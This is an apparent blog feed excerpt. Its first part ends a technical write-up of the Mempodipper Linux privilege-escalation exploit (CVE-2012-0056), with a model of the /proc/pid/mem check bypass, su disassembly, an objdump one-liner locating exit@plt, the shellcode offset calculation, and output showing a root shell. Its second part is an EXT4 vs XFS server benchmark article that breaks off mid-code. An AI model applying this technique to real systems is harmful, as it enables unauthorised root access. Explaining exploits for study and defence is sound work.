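    def write_allowed(self, writer):
        # mem_write() compares the stored id with the writer's current id.
        return self.private_data == writer.self_exec_id


def naive_attempt():
    parent = Task()
    fd = MemFd(parent)      # open /proc/self/mem before exec
    parent.do_exec()        # exec su: counter moves on, check fails
    return fd.write_allowed(parent)


def fork_trick():
    parent = Task()
    child = parent.fork()
    child.do_exec()         # child execs a helper: counter is parent + 1
    fd = MemFd(child)       # helper opens /proc/parent-pid/mem
    parent.do_exec()        # parent execs su: counter is now also + 1
    return fd.write_allowed(parent)


print(naive_attempt(), fork_trick())
```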
<div>
<div>
<pre>$ readelf -h /bin/su | grep Type
  Type:                              EXEC (Executable file)</pre>
</div>
</div>
<p>This means that <tt>su</tt> does not have a relocatable .text section (otherwise it would spit out “DYN” instead of “EXEC”). It turns out that <tt>su</tt> on the vast majority of distros is <em>not compiled with <a href="http://en.wikipedia.org/wiki/Position-independent_code">PIE</a></em>, disabling ASLR for the .text section of the binary! So we’ve chosen <tt>su</tt> wisely. The offsets in memory will always be the same. So to find the right place to write to, let’s check out the assembly surrounding the printing of the “Unknown id: blabla” error message.</p>
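<p>The field that <tt>readelf -h</tt> reports as “Type” is the 16-bit <tt>e_type</tt> value at offset 16 of the ELF header, so the same check can be sketched without <tt>readelf</tt>. The function name is made up for the example, and the sample header below is synthetic rather than taken from a real <tt>su</tt> binary.</p>

```python
import struct

ET_EXEC = 2  # fixed-address executable
ET_DYN = 3   # shared object or position-independent executable


def elf_type(header):
    """Return 'EXEC', 'DYN' or 'OTHER' from the first 18 bytes of an ELF file."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # Byte 5 (EI_DATA) is 1 for little-endian, 2 for big-endian.
    byte_order = "<" if header[5] == 1 else ">"
    (e_type,) = struct.unpack_from(byte_order + "H", header, 16)
    return {ET_EXEC: "EXEC", ET_DYN: "DYN"}.get(e_type, "OTHER")


# Synthetic little-endian 64-bit header with e_type = ET_EXEC.
sample_header = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8) + struct.pack("<H", ET_EXEC)
print(elf_type(sample_header))

# Against a real binary (path is an assumption, adjust for your system):
#   with open("/bin/su", "rb") as handle:
#       print(elf_type(handle.read(18)))
```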
<p>It gets the error string here:</p>
<div>
<div>
<pre>  403677:       ba 05 00 00 00          mov    $0x5,%edx
  40367c:       be ff 64 40 00          mov    $0x4064ff,%esi
  403681:       31 ff                   xor    %edi,%edi
  403683:       e8 e0 ed ff ff          callq  402468 (dcgettext@plt)</pre>
</div>
</div>
<p>And then writes it to stderr:</p>
<div>
<div>
<pre>  403688:       48 8b 3d 59 51 20 00    mov    0x205159(%rip),%rdi        # 6087e8 (stderr)
  40368f:       48 89 c2                mov    %rax,%rdx
  403692:       b9 20 88 60 00          mov    $0x608820,%ecx
  403697:       be 01 00 00 00          mov    $0x1,%esi
  40369c:       31 c0                   xor    %eax,%eax
  40369e:       e8 75 ea ff ff          callq  402118 (__fprintf_chk@plt)</pre>
</div>
</div>
<p>Closes the log:</p>
<div>
<div>
<pre>  4036a3:       e8 f0 eb ff ff          callq  402298 (closelog@plt)</pre>
</div>
</div>
<p>And then exits the program:</p>
<div>
<div>
<pre>  4036a8:       bf 01 00 00 00          mov    $0x1,%edi
  4036ad:       e8 c6 ea ff ff          callq  402178 (exit@plt)</pre>
</div>
</div>
<p>We therefore want to use 0x402178, which is the address of the exit function it calls. We can, in an exploit, automate the finding of the <tt>exit@plt</tt> symbol with a simple bash one-liner:</p>
<div>
<div>
<pre>$ objdump -d /bin/su|grep '&lt;exit@plt&gt;'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'
0x402178</pre>
</div>
</div>
<p>So naturally, we want to write to 0x402178 minus the number of letters in the string “Unknown id: ”, so that our shellcode is placed at exactly the right place.</p>
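<p>The arithmetic can be checked against the exploit output shown further down, which seeks to 0x40216c. A small Python sketch (the function name is illustrative, and the address is the one resolved for this particular <tt>su</tt> binary):</p>

```python
def seek_offset(exit_plt, prefix):
    # su prints the prefix first, so start that many bytes before the target
    # for the bytes that follow the prefix to land exactly on exit@plt.
    return exit_plt - len(prefix)


offset = seek_offset(0x402178, "Unknown id: ")
print(hex(offset))
```

<p>The prefix is 12 characters long, so the result is 0x402178 minus 0xc, which is 0x40216c.</p>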
<p>The shellcode should be simple and standard. It sets the uid and gid to 0 and <tt>exec</tt>s into a shell. If we want to be clever, we can restore stderr: before <tt>dup2</tt>ing the memory fd to stderr, we choose another fd to dup stderr to, and then in the shellcode, we <tt>dup2</tt> that other fd <em>back</em> to stderr.</p>
<p>In the end, the exploit works like a charm with total reliability:</p>
<div>
<div>
<pre> 
CVE-2012-0056 $ ls
build-and-run-exploit.sh  build-and-run-shellcode.sh  mempodipper.c  shellcode-32.s  shellcode-64.s
CVE-2012-0056 $ gcc mempodipper.c -o mempodipper
CVE-2012-0056 $ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6454/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x402178.
[+] Seeking to offset 0x40216c.
[+] Executing su with shellcode.
sh-4.2# whoami
root
sh-4.2#</pre>
</div>
</div>
<p>You can watch a <a href="http://youtu.be/yLu4q4gMCCA">video</a> of it in action.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1116.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>EXT4 vs XFS: large volumes with low-end RAID controller</title>
		<link>http://www.enunix.com/1088.html</link>
		<comments>http://www.enunix.com/1088.html#comments</comments>
		<pubDate>Thu, 12 Jan 2012 11:10:27 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[FileSystem]]></category>
		<category><![CDATA[RAID]]></category>
		<category><![CDATA[ext3]]></category>
		<category><![CDATA[ext4]]></category>
		<category><![CDATA[xfs]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1088</guid>
		<description><![CDATA[Some months ago, I wrote an article comparing EXT3, EXT4, XFS and BTRFS filesystem performances with a Fedora 14 x86_64 installation done on a Dell Latitude D620 laptop. While the results were quite interesting (especially to evaluate BTRFS performance), they &#8230; <a href="http://www.enunix.com/1088.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<div id="main">
<div id="main-body">
<div id="main-content">
<p>Some months ago, I wrote an article comparing EXT3, EXT4, XFS and BTRFS filesystem performance with a Fedora 14 x86_64 installation on a Dell Latitude D620 laptop. While the results were quite interesting (especially for evaluating BTRFS performance), they were collected on a consumer machine (a laptop), with a consumer-grade processor and HDD. So, the results do not necessarily translate to the server world in a linear manner: a very good filesystem for a single 2.5-inch HDD can be inadequate for a multi-disk server machine, and vice versa.</p>
<p>Today, thanks to the “Center for Research Computing” at the University of Notre Dame, and especially to Paul Brenner, Serguei Fedorov and Rich Sudlow, I am able to present some filesystem benchmark results collected on a quite powerful Dell R510 server, loaded with 12 x 2 TB SATA disks connected to a low-end, inexpensive PERC H200 controller. The article will focus on EXT4 vs XFS performance, as EXT3 cannot grow bigger than 2 TB and BTRFS is way too young (and unproven) to be considered in the server world. I hope that these data can help you choose the right filesystem for your workload.</p>
<p>While reading this article, please keep in mind that different usage patterns can favor different filesystems, so I don&#8217;t claim to crown a single filesystem as always better. I simply want to give you some numbers collected under various usage patterns, to help you choose the right filesystem for some common jobs. Please also consider that filesystem performance can vary dramatically between kernel releases; however, this should be mitigated by the fact that RHEL 6.0 uses very conservative, security-focused kernel updates.</p>
<p><strong>Filesystems, mount options and others</strong></p>
<p>As you probably know, mount options can significantly impact filesystem speed, features and reliability. Moreover, the existence of filesystem-specific options means that it is often quite hard to match them 100% across the various filesystems.</p>
<p>Fortunately, the vast majority of FS-specific options have very reasonable, reliability-focused default values, so we can generally use the defaults with no problem. However, if you want to make a meaningful comparison, one option should absolutely be the same between the different setups: the write barrier option.</p>
<p>Write barriers are a synchronization method that enables the OS to safely flush the on-disk cache content to the physical disk platters. Without write barriers, an fsync() call will flush the main memory disk cache, but it will <em>not</em> flush the disk/controller cache. While disabling barriers can sometimes speed up the filesystem/disk combo considerably, it can also lead to data loss, even when the OS assumes that all data were safely written to disk. For example, a power outage will cause the loss of any data in the disk cache that were not written to the disk platters.</p>
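<p>For reference, this is what the fsync() path looks like from an application. The sketch below is a generic Python illustration (the function name and the file path are hypothetical); it only shows the call sequence. Whether the final step also empties the cache on the drive itself depends on the barrier setting discussed here.</p>

```python
import os
import tempfile


def durable_write(path, payload):
    with open(path, "wb") as handle:
        handle.write(payload)
        # Push the userspace buffer into the kernel page cache.
        handle.flush()
        # Ask the kernel to write the cached pages out to the storage device.
        os.fsync(handle.fileno())


target = os.path.join(tempfile.mkdtemp(), "example.dat")
durable_write(target, b"benchmark data")
```

<p>With barriers enabled, the filesystem additionally asks the device to flush its volatile cache as part of that fsync(); with &#8220;nobarrier&#8221; that extra request is skipped.</p>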
<p>However, there are circumstances in which write barriers can be disabled without problems: think of a UPS-protected server with a battery-backed disk cache, or simply of a controller/disk combo with no DRAM cache at all. In these cases, a power outage will not cause any loss of cached data, so barriers can be safely disabled.</p>
<p>The Dell R510 server system used for this benchmark round is equipped with a PERC H200 disk controller with no DRAM cache. Moreover, this controller disables any disk-level cache found on the attached disks, so I disabled write barriers with the “nobarrier” mount option.</p>
<p>Please keep in mind that enabling write barriers can cause a different, FS-specific performance drop. For example, XFS generally suffers a greater drop than EXT4. So, while the relative standing should remain more or less similar, the following results should be considered valid only for installations with write barriers disabled.</p>
<p><strong>UPDATE 05/04/2011:</strong></p>
<p>For more information about EXT4 and XFS history, mount options and other things, you can visit the following Wikipedia pages:</p>
<ul>
<li>EXT4: <a href="http://en.wikipedia.org/wiki/Ext4">http://en.wikipedia.org/wiki/Ext4</a></li>
<li>XFS: <a href="http://en.wikipedia.org/wiki/Xfs">http://en.wikipedia.org/wiki/Xfs</a></li>
<li>Capabilities comparison: <a href="http://en.wikipedia.org/wiki/Comparison_of_file_systems">http://en.wikipedia.org/wiki/Comparison_of_file_systems</a></li>
</ul>
<p><strong>Testbed and methods</strong></p>
<p>The Dell R510 has the following hardware and software configuration:</p>
<ul>
<li>2x Intel Xeon E5620 with HT OFF (4 cores, 4 threads, 12 MB L3 cache) @ 2.4 GHz</li>
<li>8x 4 GB DDR3 RAM (32 GB total RAM)</li>
<li>PERC H200 RAID Controller</li>
<li>12x 2 TB 7.2K RPM SATA 3 Gbps disks</li>
<li>Red Hat Enterprise Linux 6.0 64 bit</li>
</ul>
<p>The 12 disks were assigned to 2 RAID arrays:</p>
<ul>
<li>a first, 2-disk RAID 1 array for OS installation</li>
<li>a second, 10-disk RAID 10 array for the benchmark runs</li>
</ul>
<p>To run the benchmarks, I used the following software packages:</p>
<ul>
<li>bonnie++-1.96-1.el6.rf.x86_64.rpm</li>
<li>sysbench-0.4.12-1.el6.x86_64.rpm</li>
<li>mysql-server-5.1.52-1.el6_0.1.x86_64.rpm</li>
<li>mysql-bench-5.1.52-1.el6_0.1.x86_64.rpm</li>
<li>postgresql-server-8.4.7-1.el6_0.1.x86_64.rpm</li>
<li>postgresql-test-8.4.7-1.el6_0.1.x86_64.rpm</li>
</ul>
<p>Please note that the benchmarked filesystems were optimized for the physical array layout (in this case, 5 active data disks and 64 KB stripe size). Remember that, as stated before, the PERC H200 controller does <em>not have any onboard cache, and it disables any disk-level cache</em> it finds on the attached disks. For this reason, write barriers were disabled.</p>
<p>I ran each benchmark at least 3 times and then reported the mean value.</p>
<p>A note on the CPU load number: as this Dell R510 has 8 physical cores that can manage 8 hardware threads (HyperThreading was set to OFF), the maximum CPU load percentage, as reported by the Linux kernel, is 800%. So, when you read something similar to “100% CPU load”, this means that, on average, only one core (of the 8 available) was fully utilized.</p>
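<p>As a quick way to read the CPU load figures in the graphs, the conversion can be written down in a few lines of Python. The function names are illustrative, and the default of 8 cores matches this server (two quad-core CPUs with HyperThreading off):</p>

```python
def core_equivalents(load_percent):
    # Load is reported as 100% per hardware thread, so dividing by 100
    # gives the number of fully busy cores.
    return load_percent / 100


def share_of_machine(load_percent, cores=8):
    # Fraction of the total CPU capacity of the whole machine.
    return load_percent / (cores * 100)


print(core_equivalents(100), share_of_machine(100))
```

<p>A reported load of 100% is therefore one busy core, or one eighth (12.5%) of the whole machine.</p>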
<p><strong>UPDATE 05/06/2011:</strong> <em>hardware description was updated to correctly describe the core/thread configuration. I originally wrote that the CPUs were two hexa-core ones, while they really are two quad-core processors.</em></p>
<p><strong>UPDATE 05/10/2011</strong>:<em> a reader asked me to explicitly specify the mkfs and mount parameters. For filesystem creation, I used the following commands:</em></p>
<ul>
<li><em>EXT4: mkfs.ext4 /dev/sdb1 -E stride=16,stripe-width=80</em></li>
<li><em>XFS: mkfs.xfs /dev/sdb1 -d su=64k,sw=5</em></li>
</ul>
<p><em>Both filesystems were mounted with default parameters and the &#8220;nobarrier&#8221; option.</em></p>
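<p>The stride and stripe values in these commands follow from the array geometry. As a quick check in Python, assuming a 4 KB filesystem block size (the block size is not stated in the article, so this is an assumption; the function name is illustrative):</p>

```python
def ext4_geometry(stripe_kb, block_kb, data_disks):
    # stride: filesystem blocks per RAID chunk on one disk.
    stride = stripe_kb // block_kb
    # stripe width: filesystem blocks across all data-bearing disks.
    return stride, stride * data_disks


stride, stripe_width = ext4_geometry(stripe_kb=64, block_kb=4, data_disks=5)
print(stride, stripe_width)
```

<p>This gives a stride of 16 and a stripe width of 80. The XFS options express the same geometry directly: su=64k is the per-disk stripe unit and sw=5 is the number of data disks.</p>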
<p><strong>Filesystem creation and checking time</strong></p>
<p>The first test is related to filesystem creation and checking time. The following graph shows the time needed to create and fsck the ~10 TB filesystem used to fill the RAID 10 array. The fsck command was run after the creation of a significant number of small files, obtained by unpacking the linux-2.6.36.4.tar.bz2 file downloaded from kernel.org:</p>
<p><a href="http://www.enunix.com/1088.html/1fs_creation_checking" rel="attachment wp-att-1089"><img class="alignnone size-full wp-image-1089" title="1fs_creation_checking" src="http://www.enunix.com/wp-content/uploads/2012/01/1fs_creation_checking.png" alt="" /></a></p>
<p>As you can see, XFS was way faster than EXT4 in this large volume creation and checking. However, you should not overestimate these results: remember that you generally create the FS only once, and the fsck operation should be a rare one (after all, both filesystems are journaled for this reason). On the other hand, if you plan to create or check a large filesystem very often, stay away from EXT4 and go with XFS.</p>
<p><strong>Bonnie++ results</strong></p>
<p>Sequential and random read/write speeds are two factors that can greatly influence final application speed. Let&#8217;s start by examining Bonnie++ sequential speed and CPU usage:</p>
<p><a href="http://www.enunix.com/1088.html/2bonnie_seq" rel="attachment wp-att-1090"><img class="alignnone size-full wp-image-1090" title="2bonnie_seq" src="http://www.enunix.com/wp-content/uploads/2012/01/2bonnie_seq.png" alt="" width="607" height="380" /></a></p>
<p>While EXT4 and XFS generally show comparable results both in normal, cached mode and in synchronous mode, XFS leads the sequential output (write) test by a very large margin. To tell the truth, the EXT4 sequential output test results seem unrealistically low.</p>
<p>What about random speed? Bonnie++&#8217;s random I/O test returns the number of seeks per second that the disk subsystem can sustain:</p>
<p><a href="http://www.enunix.com/1088.html/3bonnie_seeks" rel="attachment wp-att-1091"><img class="alignnone size-full wp-image-1091" title="3bonnie_seeks" src="http://www.enunix.com/wp-content/uploads/2012/01/3bonnie_seeks.png" alt="" width="607" height="380" /></a></p>
<p>The mechanical nature of current hard disks implies results that are some orders of magnitude lower than the sequential ones: considering 512-byte sectors, we are speaking about a maximum I/O transfer rate of ~264 KB/s. Considering 4096-byte sectors, the I/O transfer rate grows to a maximum of ~2114 KB/s. In this test, we see that EXT4 has a slight advantage; however, in synchronous mode the two contenders are tied.</p>
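<p>These transfer rates are simply seeks per second multiplied by the amount of data moved per seek. The seek rate itself appears only in the graph; the value of 528 seeks/s used in the Python sketch below is inferred from the ~264 KB/s figure and should be read as an assumption, as should the function name.</p>

```python
def random_io_kb_per_sec(seeks_per_sec, bytes_per_seek):
    # Each seek transfers one sector; divide by 1024 to express the rate in KB/s.
    return seeks_per_sec * bytes_per_seek / 1024


print(random_io_kb_per_sec(528, 512))
print(random_io_kb_per_sec(528, 4096))
```

<p>With 528 seeks/s this yields 264 KB/s for 512-byte sectors and 2112 KB/s for 4096-byte sectors, in line with the rounded figures quoted above.</p>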
<p>Let&#8217;s now see file creation/deletion, aka metadata handling, performance. First, normal mode:</p>
<p><a href="http://www.enunix.com/1088.html/4bonnie_file" rel="attachment wp-att-1092"><img class="alignnone size-full wp-image-1092" title="4bonnie_file" src="http://www.enunix.com/wp-content/uploads/2012/01/4bonnie_file.png" alt="" width="607" height="380" /></a></p>
<p>EXT4 really eclipses XFS in this test, scoring some very high results. However, you can argue that the ~2500 new files/sec scored by XFS should be enough for any kind of workload.</p>
<p>Now, synchronous mode:</p>
<p><a href="http://www.enunix.com/1088.html/5bonnie_file_sinc" rel="attachment wp-att-1093"><img class="alignnone size-full wp-image-1093" title="5bonnie_file_sinc" src="http://www.enunix.com/wp-content/uploads/2012/01/5bonnie_file_sinc.png" alt="" width="607" height="380" /></a></p>
<p>This time, XFS was the best.</p>
<p>So, from the Bonnie++ tests we noted that, while EXT4 excels in metadata handling, XFS seems to be faster at transferring I/O blocks from the disk subsystem, and its synchronous behavior seems to be more robust than EXT4&#8217;s.</p>
<p>One last thing to note is that Bonnie++ sometimes crashed the entire machine when running on top of an EXT4 filesystem. The cause of the crash is under investigation, but it seems related to out-of-memory conditions. While Bonnie++ (in synchronous mode) was the only test that triggered the crash, the fact that it brought down the entire machine is a bad thing. XFS, on the other hand, never had this problem.</p>
<p><strong>Sysbench file benchmark</strong></p>
<p>Filesystem I/O performance is a difficult thing to profile. For this reason, I ran another set of sequential and random I/O transfer benchmarks using the sysbench utility. Sequential speed tests were run with 2 MB blocks, while random speed tests used 4 KB blocks.</p>
<p>Let&#8217;s start with sequential speed:</p>
<p><a href="http://www.enunix.com/1088.html/6sysbench_file_seq" rel="attachment wp-att-1094"><img class="alignnone size-full wp-image-1094" title="6sysbench_file_seq" src="http://www.enunix.com/wp-content/uploads/2012/01/6sysbench_file_seq.png" alt="" width="607" height="380" /></a></p>
<p>While in normal, cached mode the two filesystems are quite evenly matched, in the synchronous test we see some divergence: XFS is faster in sequential write, while EXT4 is faster in sequential read.</p>
<p>Please note that EXT4 sequential read is higher in synchronous mode than in the normal one: can this be related to a delayed allocation side effect? Remember that in normal mode, sysbench&#8217;s test issues one fsync() per 100 writes, while in synchronous mode it issues one fsync() for each write, effectively disabling the delayed allocator. My two cents: if the read speed of the just-written files is greater in the latter mode, it may be that the delayed allocation feature can sometimes lower performance.</p>
<p>Now, random speed:</p>
<p><a href="http://www.enunix.com/1088.html/7sysbench_file_rnd" rel="attachment wp-att-1095"><img class="alignnone size-full wp-image-1095" title="7sysbench_file_rnd" src="http://www.enunix.com/wp-content/uploads/2012/01/7sysbench_file_rnd.png" alt="" width="607" height="380" /></a></p>
<p>I&#8217;m not sure how to interpret XFS random read speed, as it seems to be higher than the theoretical maximum speed (considering a 4 ms rotational delay, 4 KB blocks and 5 active data disks, we end up with a maximum of ~5000 KB/s). Probably, when using XFS, this read benchmark is greatly influenced by OS caching and/or read-ahead settings. Write speed seems fine though, and we see that XFS is faster here, by quite a large margin. However, the absolute results are very low: this is, again, a consequence of the mechanical nature of current hard disks and the lack of any caching by the controller/disk combo.</p>
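<p>The ~5000 KB/s ceiling mentioned here can be reproduced with a short Python calculation. It follows the same simplification as the estimate in the text (one random read per rotational delay, seek time ignored); the function name is illustrative.</p>

```python
def max_random_read_kb_per_sec(rotational_delay_ms, block_kb, data_disks):
    # One random read per rotational delay gives the per-disk IOPS ceiling.
    iops_per_disk = 1000 / rotational_delay_ms
    # Each read moves one block, and the data disks work in parallel.
    return iops_per_disk * block_kb * data_disks


print(max_random_read_kb_per_sec(4, 4, 5))
```

<p>That is 250 reads per second per disk, times 4 KB, times 5 disks, or 5000 KB/s. Any measured value above this points to reads being served from cache rather than from the platters.</p>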
<p><strong>Untar and cat time</strong></p>
<p>It is very common in the Linux world to distribute a very large number of quite small files using a compressed, single-file archive created with the tar and bzip2/gzip utilities. For example, Linux kernel sources (downloadable from kernel.org) are distributed in this manner.</p>
<p>So, an interesting benchmark would be to record the time needed to untar (extract) the Linux kernel .tar.bz2 file, and then to read back the just-extracted files:</p>
<p><a href="http://www.enunix.com/1088.html/8untar_cat" rel="attachment wp-att-1096"><img class="alignnone size-full wp-image-1096" title="8untar_cat" src="http://www.enunix.com/wp-content/uploads/2012/01/8untar_cat.png" alt="" width="607" height="380" /></a></p>
<p>EXT4 is faster in the extraction process, especially considering the very low final sync time.</p>
<p>When considering cat (read) time, however, XFS is the best.</p>
<p>So, these first results show us that there is no single, best-of-all filesystem. It all depends on the I/O request (read or write) and the workload type (sequential, random, cached, synchronous, etc.).</p>
<p>UPDATE 05/04/2011: <em>I added the detailed mysql-bench results graph.</em></p>
<p><strong>MySQL benchmarks</strong></p>
<p>It&#8217;s now time for some database testing.</p>
<p>The first one is about creating and populating a MySQL database with 10 million rows, using the sysbench oltp prepare benchmark. Which is faster, XFS or EXT4?</p>
<p><a href="http://www.enunix.com/1088.html/9sysbench_mysql_prepare" rel="attachment wp-att-1097"><img class="alignnone size-full wp-image-1097" title="9sysbench_mysql_prepare" src="http://www.enunix.com/wp-content/uploads/2012/01/9sysbench_mysql_prepare.png" alt="" width="607" height="380" /></a></p>
<p>It seems that XFS wins by a small margin.</p>
<p>What happens when we start to query the db?</p>
<p><a href="http://www.enunix.com/1088.html/10sysbench_mysql_simple-2" rel="attachment wp-att-1099"><img class="alignnone size-full wp-image-1099" title="10sysbench_mysql_simple" src="http://www.enunix.com/wp-content/uploads/2012/01/10sysbench_mysql_simple1.png" alt="" width="607" height="380" /></a></p>
<p>In this simple, read-only test we have a tie.</p>
<p>Now, the complex, read-write, transactional test:</p>
<p><a href="http://www.enunix.com/1088.html/11sysbench_mysql_complex" rel="attachment wp-att-1100"><img class="alignnone size-full wp-image-1100" title="11sysbench_mysql_complex" src="http://www.enunix.com/wp-content/uploads/2012/01/11sysbench_mysql_complex.png" alt="" width="607" height="380" /></a></p>
<p>We have another virtual tie here.</p>
<p>Last but not least, we have the mysql-bench benchmark scores:</p>
<p><a href="http://www.enunix.com/1088.html/12mysql_bench" rel="attachment wp-att-1101"><img class="alignnone size-full wp-image-1101" title="12mysql_bench" src="http://www.enunix.com/wp-content/uploads/2012/01/12mysql_bench.png" alt="" width="607" height="380" /></a></p>
<p>Please note that this benchmark tests various aspects of a MySQL database, and some of them are not directly influenced by I/O speed. So, XFS&#8217;s win is quite a remarkable one.</p>
<p>Finally, have a look at the detailed mysql-bench report:</p>
<p><a href="http://www.enunix.com/1088.html/13mysql_bench_detail" rel="attachment wp-att-1103"><img class="alignnone size-full wp-image-1103" title="13mysql_bench_detail" src="http://www.enunix.com/wp-content/uploads/2012/01/13mysql_bench_detail.png" alt="" width="607" height="380" /></a></p>
<p>&nbsp;</p>
<p>So, summarizing the MySQL results, we can conclude that while XFS is slightly faster than EXT4, you cannot go wrong with either of these two filesystems.</p>
<p><strong>PostgreSQL benchmarks:</strong></p>
<p>&nbsp;</p>
<p>Another popular, open source database server is PostgreSQL. Which filesystem is the fastest here?</p>
<p>The first test is about creating and populating a PostgreSQL database with 100 thousand rows, using the sysbench oltp prepare test:</p>
<p><a style="color: #ff4b33; line-height: 24px;" href="http://www.enunix.com/1088.html/14sysbench_psql_prepare" rel="attachment wp-att-1102"><img class="alignnone size-full wp-image-1102" style="border-style: initial; border-color: initial;" title="14sysbench_psql_prepare" src="http://www.enunix.com/wp-content/uploads/2012/01/14sysbench_psql_prepare.png" alt="" width="607" height="380" /></a></p>
<p>We have a great EXT4 victory here, with a prepare time way lower than the XFS one.</p>
<p>Now, let&#8217;s start to query the db with the simple, read-only sysbench oltp benchmark:</p>
<p><a href="http://www.enunix.com/1088.html/15sysbench_psql_simple" rel="attachment wp-att-1105"><img class="alignnone size-full wp-image-1105" title="15sysbench_psql_simple" src="http://www.enunix.com/wp-content/uploads/2012/01/15sysbench_psql_simple.png" alt="" width="607" height="380" /></a></p>
<p>In this read-only test, XFS is no slower than EXT4.</p>
<p>What happens in the complex, read-write, transactional benchmark?</p>
<p><a href="http://www.enunix.com/1088.html/16sysbench_psql_complex" rel="attachment wp-att-1106"><img class="alignnone size-full wp-image-1106" title="16sysbench_psql_complex" src="http://www.enunix.com/wp-content/uploads/2012/01/16sysbench_psql_complex.png" alt="" width="607" height="380" /></a></p>
<p>EXT4 is again much faster than XFS.</p>
<p>From these tests it seems that when dealing with writes, EXT4 is faster than XFS in PostgreSQL&#8217;s workload type.</p>
<p>Finally, I ran the pgbench benchmark, with scale and requests per client both set to 1000. First, the prepare time:</p>
<p><a href="http://www.enunix.com/1088.html/17pgbench_prepare" rel="attachment wp-att-1110"><img class="alignnone size-full wp-image-1110" title="17pgbench_prepare" src="http://www.enunix.com/wp-content/uploads/2012/01/17pgbench_prepare.png" alt="" width="607" height="380" /></a></p>
<p>This time, XFS shows the same performance as EXT4.</p>
<p>Now, the real benchmark run:</p>
<p><a href="http://www.enunix.com/1088.html/18pgbench_tps" rel="attachment wp-att-1107"><img class="alignnone size-full wp-image-1107" title="18pgbench_tps" src="http://www.enunix.com/wp-content/uploads/2012/01/18pgbench_tps.png" alt="" width="607" height="380" /></a></p>
<p>EXT4 is again over 2X faster than XFS.</p>
<p>So, in the end, if you plan to use PostgreSQL, go with the EXT4 filesystem (especially if you plan to execute a large number of INSERT / UPDATE / TRANSACTION statements).</p>
<p><strong>Fragmentation</strong></p>
<p>Fragmentation is the #1 enemy of mechanical disks, as every head movement corresponds to lower total I/O performance.</p>
<p>Both EXT4 and XFS have a reputation for being very fragmentation resistant, but which is better? Let&#8217;s start by counting fragments per file after the extraction of the Linux kernel .tar.bz2 file (see the untar test above for more information):</p>
<p><a href="http://www.enunix.com/1088.html/19untar_frag" rel="attachment wp-att-1108"><img class="alignnone size-full wp-image-1108" title="19untar_frag" src="http://www.enunix.com/wp-content/uploads/2012/01/19untar_frag.png" alt="" width="607" height="380" /></a></p>
<p>Yeah, both filesystems were exceptionally resistant to fragmentation here, showing perfect results.</p>
<p>Sysbench&#8217;s sequential and random tests give us another interesting point of reference in this discipline. First, the fragmentation status after the sequential write test:</p>
<p><a href="http://www.enunix.com/1088.html/20sysbench_seqwr_frag" rel="attachment wp-att-1109"><img class="alignnone size-full wp-image-1109" title="20sysbench_seqwr_frag" src="http://www.enunix.com/wp-content/uploads/2012/01/20sysbench_seqwr_frag.png" alt="" width="607" height="380" /></a></p>
<p>Now XFS is the leader, with EXT4 lagging quite far behind. It is interesting to note that in the synchronous test (one write / one fsync) EXT4 exhibits lower fragmentation: this can explain the higher sequential read results in synchronous mode recorded earlier. Speaking about XFS, it seems that this filesystem manages large files optimally, and its high sequential read/write speeds are likely a result of the complete lack of fragmentation in this class of files.</p>
<p>The random write test is a harder one:</p>
<p><a href="http://www.enunix.com/1088.html/21sysbench_rndwr_frag" rel="attachment wp-att-1104"><img class="alignnone size-full wp-image-1104" title="21sysbench_rndwr_frag" src="http://www.enunix.com/wp-content/uploads/2012/01/21sysbench_rndwr_frag.png" alt="" width="607" height="380" /></a></p>
<p>In this case, both filesystems become heavily fragmented, proving that no filesystem is completely immune to this issue. However, XFS has an edge here: it ships with a functional, proven defragmenter, while the EXT4 package lacks an official, stable-released defrag utility (while this utility exists, it is more or less in a beta stage).</p>
<p><strong>Conclusions</strong></p>
<p>Well, if you arrived here, congratulations: you had the patience to analyze about 20 graphs!</p>
<p>So, in the end, which filesystem should you choose for your server, EXT4 or XFS? As stated above, it all depends on the expected workload type. Below are my recommendations:</p>
<ul>
<li><strong>workstation machine:</strong> you cannot go wrong with either of these two filesystems. While EXT4 is better at file creation and deletion (a common job on any machine), XFS rebalances the choice thanks to higher speed with large files and near-perfect fragmentation resistance</li>
<li><strong>development machine: </strong>if you plan to often create / delete / check any large volume, absolutely go with XFS</li>
<li><strong>web server (apache + mysql): </strong>although EXT4 is competitive, XFS&#8217;s higher MySQL and large-file performance gives it the edge here</li>
<li><strong>file server: </strong>if you plan to store and actively use some large files, go with XFS; in the other case (small files) go with EXT4</li>
<li><strong>MySQL database server: </strong>I slightly prefer XFS for this kind of workload</li>
<li><strong>PostgreSQL server: </strong>definitely go with EXT4</li>
<li><strong>virtualization (consolidation) server: </strong>while virtual machine consolidation is a very complex topic and a definitive answer will require extensive testing, I think that XFS should be the better choice as it has great large-file performance and excellent fragmentation behavior (also don&#8217;t forget its online defrag utility)</li>
</ul>
<p><strong>UPDATE 05/04/2011:</strong> <em>Paul asked me to better explain the different filesystem choices for the two database systems benchmarked (MySQL and PostgreSQL). The point is that, while both MySQL and PostgreSQL are very common open source databases, their implementations (and, to a certain extent, their purposes) are very different. For example, MySQL has optimizations aimed at converting some random I/O operations into sequential ones (or delaying them). With these optimizations, MySQL can coalesce several random I/O operations into a single sequential read/write. PostgreSQL, instead, uses different optimizations and generally tends not to delay random I/O writes. So, it is not surprising that EXT4 and XFS behave quite differently with these two database servers.</em></p>
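<p>To make the idea of coalescing concrete, here is a toy Python sketch. It is not MySQL code and does not reflect its actual implementation; the function name and the block numbers are invented for illustration. It sorts a batch of pending block writes and merges adjacent blocks into contiguous runs, each of which could then be issued as one sequential write.</p>

```python
def coalesce_writes(blocks):
    # Sort the pending block numbers and drop duplicates.
    runs = []
    for block in sorted(set(blocks)):
        if runs and block == runs[-1][1] + 1:
            # The block directly follows the current run, so extend it.
            runs[-1][1] = block
        else:
            # Otherwise a new run starts at this block.
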